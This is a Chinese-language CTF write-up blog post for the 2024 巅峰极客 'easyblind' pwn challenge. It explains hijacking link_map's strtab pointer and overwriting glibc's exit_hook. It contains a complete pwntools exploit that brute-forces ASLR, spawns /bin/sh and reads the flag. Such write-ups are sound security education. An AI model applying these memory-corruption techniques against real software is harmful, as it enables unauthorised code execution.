<!DOCTYPE html><html lang="en" theme-mode="dark"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>[strtab劫持] 2024巅峰极客 easyblind | Hexo</title><link rel="icon" type="image/x-icon" href="/favicon.ico"><link rel="preload" as="font" crossorigin="anonymous" href="/font/Bender.ttf"><link rel="preload" as="font" crossorigin="anonymous" href="/font/BenderLight.ttf"><link rel="preload" as="font" crossorigin="anonymous" href="/font/JetBrainsMono-Regular.woff2"><link rel="stylesheet" href="/css/arknights.css"><style>@font-face {
  font-family: Bender;
  src: local('Bender'), url("/font/Bender.ttf"), url("/font/Bender.otf");
}
@font-face {
  font-family: BenderLight;
  src: local('BenderLight'), url("/font/BenderLight.ttf");
}
@font-face {
  font-family: 'JetBrains Mono';
  src: local('JetBrains Mono'), url('/font/JetBrainsMono-Regular.woff2') format('woff2');
}
</style><script>var config = {"root":"/","search":{"preload":false,"activeHolder":"Enter here","blurHolder":"Search","noResult":"Data \"$0\" not found"},"code":{"codeInfo":"$0 - $1 lines","copy":"copy"}}</script><link type="text/css" rel="stylesheet" href="/lib/encrypt/hbe.style.css"><script src="//unpkg.com/mermaid@10.5.0/dist/mermaid.min.js"></script><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lightgallery.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-zoom.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-thumbnail.css"><link type="text/css" rel="stylesheet" href="/lib/fontawesome/css/all.min.css"><script>if (window.localStorage.getItem('theme-mode') === 'light')
 document.documentElement.setAttribute('theme-mode', 'light')
if (window.localStorage.getItem('theme-mode') === 'dark')
 document.documentElement.setAttribute('theme-mode', 'dark')</script><style>@font-face {
 font-family: BenderLight;
 src: local('Bender'), url("/font/BenderLight.woff2") format('woff2');
}
@font-face {
 font-family: 'JetBrains Mono';
 src: local('JetBrains Mono'), url('/font/JetBrainsMono-Regular.woff2') format('woff2');
}</style><style>:root {
 --dark-background: url('/img/bg1.jpg');
 --light-background: url('/img/bg1.jpg');
 --theme-encrypt-confirm: 'confirm'
}</style><script defer src="/js/arknights.js"></script><script defer src="/js/search.js"></script><script async src="//unpkg.com/valine/dist/Valine.min.js"></script><script defer type="module">import mermaid from '//unpkg.com/mermaid@10.5.0/dist/mermaid.esm.mjs';
window.mermaid = mermaid;
code.paintMermaid();
</script><script async src="//unpkg.com/lightgallery@2.7.1/lightgallery.min.js"></script><script async src="//unpkg.com/lightgallery@2.7.1/plugins/zoom/lg-zoom.min.js"></script><script async src="//unpkg.com/lightgallery@2.7.1/plugins/thumbnail/lg-thumbnail.min.js"></script><script async src="/lib/encrypt/hbe.js"></script><script async src="/js/pjax.js"></script><script class="pjax-js">reset= () => {new Valine({
 el: '#valine'
 , appId: 'LBu2DnhuauLyX07fYwU7uiQt-gzGzoHsz'
 , appKey: 'WILjrWg7NsLKrjRrsBineLLo' , placeholder: 'This comment is sent by Penguin Logistics.'
 , path: window.location.pathname
});document.querySelector('.lg-container')?.remove()
lightGallery(document.getElementById('post-bg'), {
  plugins: [lgZoom,lgThumbnail],
  selector: '.item-img'})}</script><script>window.addEventListener("load",() => {pjax = new Pjax({
 cacheBust: false,
 selectors: ['title','article','#aside-block','.pjax-js','data-pjax','.busuanzi'],
 switches: {'article': Pjax.switches.sideBySide},
 switchesOptions: {
   'article': {
     classNames: {
       remove: "pjax-out",
       add: "pjax-in"
     }
   }
 }
});
document.addEventListener("pjax:complete", reset);reset()})</script><script class="pjax-js">reset= () => {new Valine({
 el: '#valine'
 , appId: 'LBu2DnhuauLyX07fYwU7uiQt-gzGzoHsz'
 , appKey: 'WILjrWg7NsLKrjRrsBineLLo' , placeholder: 'This comment is sent by Penguin Logistics.'
 , path: window.location.pathname
});document.querySelector('.lg-container')?.remove()
lightGallery(document.getElementById('post-bg'), {
  plugins: [lgZoom,lgThumbnail],
  selector: '.item-img'})}</script><script>window.addEventListener("load",() => {pjax = new Pjax({
 cacheBust: false,
 selectors: ['title','article','#aside-block','.pjax-js'],
 switches: {'article': Pjax.switches.sideBySide},
 switchesOptions: {
   'article': {
     classNames: {
       remove: "pjax-out",
       add: "pjax-in"
     }
   }
 }
});
document.addEventListener("pjax:complete", reset);reset()})</script><meta name="generator" content="Hexo 7.3.0"></head><body><div class="loading" style="opacity: 0;"><div class="loadingBar left"></div><div class="loadingBar right"></div></div><main><header class="closed"><div class="navBtn"><i class="navBtnIcon"><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span></i></div><nav><div class="navItem" id="search-header"><span class="navItemTitle"><input autocomplete="off" autocorrect="off" autocapitalize="none" placeholder="Search" spellcheck="false" maxlength="50" type="text" id="search-input"></span></div><div class="navItem" id="search-holder"></div><div class="search-popup" tabindex="0"><div id="search-result"></div></div><ol class="navContent"><li class="navItem"><a class="navBlock" href="/"><span class="navItemTitle">Home</span></a></li><li class="navItem" matchdata="categories,tags"><a class="navBlock" href="/archives/"><span class="navItemTitle">Archives</span></a></li></ol></nav></header><article><div id="post-bg"><div id="post-title"><h1>[strtab劫持] 2024巅峰极客 easyblind</h1><div id="post-info"><span>First Post: <div class="control"><time datetime="2024-09-30T15:22:48.000Z" id="date"> 2024-09-30</time></div></span><br><span>Last Update: <div class="control"><time datetime="2024-09-30T15:37:43.542Z" id="updated"> 2024-09-30</time></div></span></div></div><hr><div id="post-content"><h3 id="2024巅峰极客Easyblind"><a href="#2024巅峰极客Easyblind" class="headerlink" title="2024巅峰极客Easyblind"></a>2024巅峰极客Easyblind</h3><h5 id="前置"><a href="#前置" class="headerlink" title="前置"></a>前置</h5><p>1.需要有ret2dlresolve的基础知识</p>
<p>2.该题第一步如何实现loop，在<a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_54218833/article/details/141371083">C0Lin师傅的博客</a>中有分析这里就不细讲了。</p>
<p>3.对exit_hook有基本了解</p>
<h4 id="关于link-map的strtab劫持"><a href="#关于link-map的strtab劫持" class="headerlink" title="关于link_map的strtab劫持"></a>关于link_map的strtab劫持</h4><p>首先看，通过ret2dlresolve可以知道延迟绑定，需要通过_dl_fixup函数：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs c">_dl_fixup (<br><span class="hljs-meta"># <span class="hljs-keyword">ifdef</span> ELF_MACHINE_RUNTIME_FIXUP_ARGS</span><br>	   ELF_MACHINE_RUNTIME_FIXUP_ARGS,<br><span class="hljs-meta"># <span class="hljs-keyword">endif</span></span><br>	   <span class="hljs-keyword">struct</span> link_map *l, ElfW(Word) reloc_arg)<br>&#123;<br>  <span class="hljs-type">const</span> <span class="hljs-title function_">ElfW</span><span class="hljs-params">(Sym)</span> *<span class="hljs-type">const</span> symtab<br>    = (<span class="hljs-type">const</span> <span class="hljs-type">void</span> *) D_PTR (l, l_info[DT_SYMTAB]);<span class="hljs-comment">// 获取符号表地址</span><br>  <span class="hljs-type">const</span> <span class="hljs-type">char</span> *strtab = (<span class="hljs-type">const</span> <span class="hljs-type">void</span> *) D_PTR (l, l_info[DT_STRTAB]);<span class="hljs-comment">// 获取字符串表地址</span><br>  ...<br></code></pre></td></tr></table></figure>

<p>主要看strtab是如何获取地址的，D_PTR (l, l_info[DT_STRTAB])展开后是((l)-&gt;l_info[5]-&gt;d_un.d_ptr + (dl_relocate_ld (l) ? 0 : (l)-&gt;l_addr))，本质就是通过link_map保存的指向dynamic结构体：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-keyword">typedef</span> <span class="hljs-class"><span class="hljs-keyword">struct</span></span><br><span class="hljs-class">&#123;</span><br>  Elf64_Sxword	d_tag;			<span class="hljs-comment">/* Dynamic entry type */</span><br>  <span class="hljs-class"><span class="hljs-keyword">union</span></span><br><span class="hljs-class">    &#123;</span><br>      Elf64_Xword d_val;		<span class="hljs-comment">/* Integer value */</span><br>      Elf64_Addr d_ptr;			<span class="hljs-comment">/* Address value */</span><br>    &#125; d_un;<br>&#125; Elf64_Dyn;<br></code></pre></td></tr></table></figure>

<p>d_ptr保存的就是指向strtab的地址，读取的汇编代码如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs assembly">&lt;_dl_fixup+49&gt; mov rcx, qword ptr [rbx + 0x68]// rbx就是指向的link_map的地址<br>&lt;_dl_fixup+56&gt; add rdi, qword ptr [rcx + 8]// rcx就是指向保存strtab的dynamic结构体<br>																					// [rcx+8]就是取出strtab<br></code></pre></td></tr></table></figure>

<p>那么只要修改link_map+0x68指向的地址到可控地址，下次延迟绑定时就可以任意libc函数执行了。一般就是修改其后几位使其指向bss段上面的可控地址，或者用写入heap地址，然后将可控地址的偏移为st_name的地方写上想要执行函数的字符串即可。</p>
<p>对于该题我们每一次循环可以任意修改一字节libc和ld可写段的内容，因此link_map+0x68是可以成功修改的，同时根据改题正常想法会去修改link_map+0x68保存的地址为执行bss段上保存malloc的chunk的地址-8，这样strtab就是执行题目申请的那个地址了。</p>
<p>但是如下面数据所示0x5621e5e41e78为link_map+0x68保存的地址，0x5621e5e41e80保存的是strtab的地址，而malloc的地址保存在0x5621e5e42050，同0x5621e5e41e78相差大于一个字节，题目一次修改则只能改一次字节，每次都要经过延迟绑定，必定会报错退出。在细看下面数据0x5621e5e41ec0指向的0x7ff3f2d75160是在libc空间附近的地址，这个东西就是dyn里的_r_debug，因此我们可以将link_map+0x68保存的地址0x5621e5e41e78最后一个字节改成b8，将strtab劫持到0x7ff3f2d75160上，且此地址里的内容可以为本题修改。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-number">00</span>:<span class="hljs-number">0000</span>│  <span class="hljs-number">0x5621e5e41e78</span> ◂— <span class="hljs-number">0x5</span><br><span class="hljs-number">01</span>:<span class="hljs-number">0008</span>│  <span class="hljs-number">0x5621e5e41e80</span> —▸ <span class="hljs-number">0x5621e5e43000</span> ◂— <span class="hljs-number">0x6f732e6362696c00</span><br><span class="hljs-number">02</span>:<span class="hljs-number">0010</span>│  <span class="hljs-number">0x5621e5e41e88</span> ◂— <span class="hljs-number">0x6</span><br><span class="hljs-number">03</span>:<span class="hljs-number">0018</span>│  <span class="hljs-number">0x5621e5e41e90</span> —▸ <span class="hljs-number">0x5621e5e43110</span> ◂— <span class="hljs-number">0x0</span><br><span class="hljs-number">04</span>:<span class="hljs-number">0020</span>│  <span class="hljs-number">0x5621e5e41e98</span> ◂— <span class="hljs-number">0xa</span> <span class="hljs-comment">/* &#x27;\n&#x27; */</span><br><span class="hljs-number">05</span>:<span class="hljs-number">0028</span>│  <span class="hljs-number">0x5621e5e41ea0</span> ◂— <span class="hljs-number">0x109</span><br><span class="hljs-number">06</span>:<span class="hljs-number">0030</span>│  <span class="hljs-number">0x5621e5e41ea8</span> ◂— <span class="hljs-number">0xb</span> <span class="hljs-comment">/* &#x27;\x0b&#x27; */</span><br><span class="hljs-number">07</span>:<span class="hljs-number">0038</span>│  <span class="hljs-number">0x5621e5e41eb0</span> ◂— <span class="hljs-number">0x18</span><br><span class="hljs-number">08</span>:<span class="hljs-number">0040</span>│  <span class="hljs-number">0x5621e5e41eb8</span> ◂— <span class="hljs-number">0x15</span><br><span class="hljs-number">09</span>:<span class="hljs-number">0048</span>│  <span class="hljs-number">0x5621e5e41ec0</span> —▸ <span class="hljs-number">0x7ff3f2d75160</span> (_r_debug) ◂— <span class="hljs-number">0x1</span><br><span class="hljs-number">0</span>a:<span class="hljs-number">0050</span>│  <span class="hljs-number">0x5621e5e41ec8</span> ◂— <span class="hljs-number">0x3</span><br><span class="hljs-number">0b</span>:<span class="hljs-number">0058</span>│  <span class="hljs-number">0x5621e5e41ed0</span> —▸ <span class="hljs-number">0x5621e5e42000</span> ◂— <span class="hljs-number">0x3df8</span><br></code></pre></td></tr></table></figure>

<p>通过上面的方法对0x7ff3f2d75160+st_name(该题的write的st_name为62)地址写函数字符串则可以实现任意libc函数的执行</p>
<p>正常解析过程为:<img src="/../picture/strtab1.png"></p>
<p>劫持后的解析过程:<img src="/../picture/strtab2.png"></p>
<p>即便能任意执行system，但是rdi不可控，所以只能另外想办法，同时该题泄露地址困难，题目没有像其他正常题目会进行setbuf，所以的IO_file里的各个指针都未初始化，即便执行putchar，使得指针初始化，指向的地址是也是heap段上，所以泄露困难。</p>
<p>该题需要注意的是write字符串篇偏移是62，而_r_debug+62刚好指向了link_map:main的l_name+6，如果写字符串则会修改l_name和l_ld，但是这两个东西并不会影响到延迟绑定程序。下面数据中0x7fa2d9c11190是link_map，加8则是l_name。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">pwndbg&gt; telescope 0x7fa2d9c11190<br>00:0000│       0x7fa2d9c11190 —▸ 0x558449dc2018 ◂— 0x10c0<br>01:0008│ r10-6 0x7fa2d9c11198 ◂— 0x78657fa2d9c11730<br>02:0010│       0x7fa2d9c111a0 ◂— 0x558449007469 /* &#x27;it&#x27; */<br>03:0018│       0x7fa2d9c111a8 —▸ 0x7fa2d9c11740 —▸ 0x7fffd33b9000 ◂— jg 0x7fffd33b9047<br>04:0020│       0x7fa2d9c111b0 ◂— 0x0<br>05:0028│       0x7fa2d9c111b8 —▸ 0x7fa2d9c11190 —▸ 0x558449dc2018 ◂— 0x10c0<br>06:0030│       0x7fa2d9c111c0 ◂— 0x0<br>07:0038│       0x7fa2d9c111c8 —▸ 0x7fa2d9c11718 —▸ 0x7fa2d9c11730 ◂— 0x0<br></code></pre></td></tr></table></figure>



<h4 id="exit-hook"><a href="#exit-hook" class="headerlink" title="exit_hook"></a>exit_hook</h4><p>参考了当时唯一解Tplus师傅的wp，师傅用的方法是利用exit_hook。</p>
<blockquote>
<p><strong>调试exit_hook需要找到_rtld_global的地址，以及对应的偏移地址，题目只给libc和ld，不好找，非常建议使用<a target="_blank" rel="noopener" href="https://github.com/GeekCmore/cpwn">cpwn</a>一键帮你配好调试的symblos和源码，用过的都说好。</strong></p>
</blockquote>
<p>exit_hook主要是利用这两个函数</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs c">_dl_rtld_lock_recursive = <span class="hljs-number">0x7fda65ae3150</span> &lt;rtld_lock_default_lock_recursive&gt;,<br>  _dl_rtld_unlock_recursive = <span class="hljs-number">0x7fda65ae3160</span> &lt;rtld_lock_default_unlock_recursive&gt;,<br></code></pre></td></tr></table></figure>

<p>此刻的system地址为0x7fda65940290，有6位不同后三位固定不用爆破，前3位需要爆破，则成功率为1&#x2F;(16*16*16)即1&#x2F;4096。因此这题特地给了个map.txt就是不想你爆破太久。</p>
<p>在libc2.31环境下_dl_rtld_lock_recursive地址为_rtld_global+3848，与ld可写段段偏移为0xf68</p>
<p>同时rdi指向的是_rtld_global+2312与漏洞偏移为0x968</p>
<p>该题payload的数据是固定的，搞出payload一次性输出即可，减少交互次数。</p>
<p>exp:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment">#!/usr/bin/env python3</span><br><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-comment">#context.log_level = &quot;debug&quot;</span><br>p_addr = <span class="hljs-keyword">lambda</span> name, addr : <span class="hljs-built_in">print</span>(<span class="hljs-string">f&#x27;<span class="hljs-subst">&#123;name&#125;</span>: <span class="hljs-subst">&#123;<span class="hljs-built_in">hex</span>(addr)&#125;</span>&#x27;</span>)<br>ru=<span class="hljs-keyword">lambda</span> s :p.recvuntil(s)<br>rut=<span class="hljs-keyword">lambda</span> s,t :p.recvuntil(s,timeout=t)<br>r=<span class="hljs-keyword">lambda</span> n :p.recv(n)<br>sla=<span class="hljs-keyword">lambda</span> d,b:p.sendlineafter(d,b)<br>sa=<span class="hljs-keyword">lambda</span> d,b:p.sendafter(d,b)<br>sl=<span class="hljs-keyword">lambda</span> s :p.sendline(s)                                  <br>sls=<span class="hljs-keyword">lambda</span> s :p.sendline(<span class="hljs-built_in">str</span>(s).encode())<br>ss=<span class="hljs-keyword">lambda</span> s :p.send(<span class="hljs-built_in">str</span>(s).encode())<br>s=<span class="hljs-keyword">lambda</span> s :p.send(s)<br>uu64=<span class="hljs-keyword">lambda</span> data :u64(data.ljust(<span class="hljs-number">8</span>,<span class="hljs-string">b&#x27;\x00&#x27;</span>))<br>it=<span class="hljs-keyword">lambda</span> :p.interactive()<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">write_one</span>(<span class="hljs-params">addr, data</span>):<br>    tmp = <span class="hljs-string">b&quot;&quot;</span><br>    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-built_in">len</span>(data)):<br>        tmp += (p64(addr+i)+p8(data[i]))   <br>    <span class="hljs-keyword">return</span> tmp<br>p = process(<span class="hljs-string">&quot;./pwn&quot;</span>)<br><span class="hljs-comment">#io = remote(&quot;node4.buuoj.cn&quot;, 29129)</span><br>ld = <span class="hljs-number">0x265000</span> - <span class="hljs-number">0x10</span><br><span class="hljs-comment">#ld = 0x26b000 - 0x10</span><br>link_base_addr = ld + <span class="hljs-number">0x1190</span><br>link_dyn_str = link_base_addr + <span class="hljs-number">0x68</span><br>fake_str = ld + <span class="hljs-number">0x1160</span><br>exit_hook = ld + <span class="hljs-number">0xf68</span><br>exit_hook_rdi = ld + <span class="hljs-number">0x968</span><br>write_st_name = <span class="hljs-number">62</span><br><br>payload = <span class="hljs-string">b&quot;&quot;</span><br><br>payload+= (p64(link_base_addr)+p8(<span class="hljs-number">0x18</span>))<br><br>str_ = <span class="hljs-string">b&quot;\x90\x62\xb6&quot;</span><br><span class="hljs-comment">#str_ = b&quot;\x90\x72\xe2&quot;</span><br>payload+= write_one(exit_hook, str_)<br><br>str_ = <span class="hljs-string">b&quot;/bin/sh\x00&quot;</span><br>payload+= write_one(exit_hook_rdi, str_)<br><br>str_ = <span class="hljs-string">b&quot;exit\x00&quot;</span><br>payload+= write_one(fake_str+write_st_name, str_)<br><br>payload+= (p64(link_dyn_str)+p8(<span class="hljs-number">0xb8</span>))<br><br>count = <span class="hljs-number">0</span><br><span class="hljs-keyword">while</span> (<span class="hljs-literal">True</span>):<br>    <span class="hljs-keyword">try</span>:<br>        p = process(<span class="hljs-string">&quot;./pwn&quot;</span>)<br>        s(payload)<br>        sl(<span class="hljs-string">b&quot;echo ok&quot;</span>)<br>        p.recvuntil(<span class="hljs-string">b&quot;ok&quot;</span>)<br>        sl(<span class="hljs-string">b&quot;cat /flag&quot;</span>)<br>        p.interactive()<br>        <span class="hljs-keyword">break</span><br>    <span class="hljs-keyword">except</span> Exception <span class="hljs-keyword">as</span> e:<br>        p.close()<br>        count+=<span class="hljs-number">1</span><br>        <span class="hljs-built_in">print</span>(count)<br>        <span class="hljs-keyword">continue</span><br><br><br>it()<br></code></pre></td></tr></table></figure>



<div id="paginator"></div></div><div id="post-footer"></div><div id="comments"><div id="valine"></div></div></div><div class="bottom-btn"><div><a class="i-top" id="to-top" onClick="scrolls.scrolltop();" title="To Top" style="opacity: 0; display: none;">∧ </a><a class="i-index" id="to-index" href="#toc-div" title="To Catalog">≡</a><a class="i-color" id="color-mode" onClick="colorMode.change()" title="Change Theme"></a></div></div></article><aside><div id="about"><a href="/" id="logo"><img src="https://ak.hypergryph.com/assets/index/images/ak/pc/faction/4.png" alt="Logo"></a><h1 id="Dr"><a href="/">Dr.XDLiu</a></h1><div id="description"><p></p></div></div><div id="aside-block"><div id="toc-div"><h1>Catalog</h1><ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#2024%E5%B7%85%E5%B3%B0%E6%9E%81%E5%AE%A2Easyblind"><span class="toc-number">1.</span> <span class="toc-text">2024巅峰极客Easyblind</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E5%89%8D%E7%BD%AE"><span class="toc-number">1.0.1.</span> <span class="toc-text">前置</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%85%B3%E4%BA%8Elink-map%E7%9A%84strtab%E5%8A%AB%E6%8C%81"><span class="toc-number">1.1.</span> <span class="toc-text">关于link_map的strtab劫持</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#exit-hook"><span class="toc-number">1.2.</span> <span class="toc-text">exit_hook</span></a></li></ol></li></ol></div></div><footer></footer></aside><!--    nobr #{__('footer.publish')}   a(href= 'http://hexo.io') Hexo
wbr
nobr  Theme 
  a(href= 'https://github.com/Yue-plus/hexo-theme-arknights') Arknights
wbr
nobr  by 
  a(href= 'https://github.com/Yue-plus') Yue_plus--></main></body></html>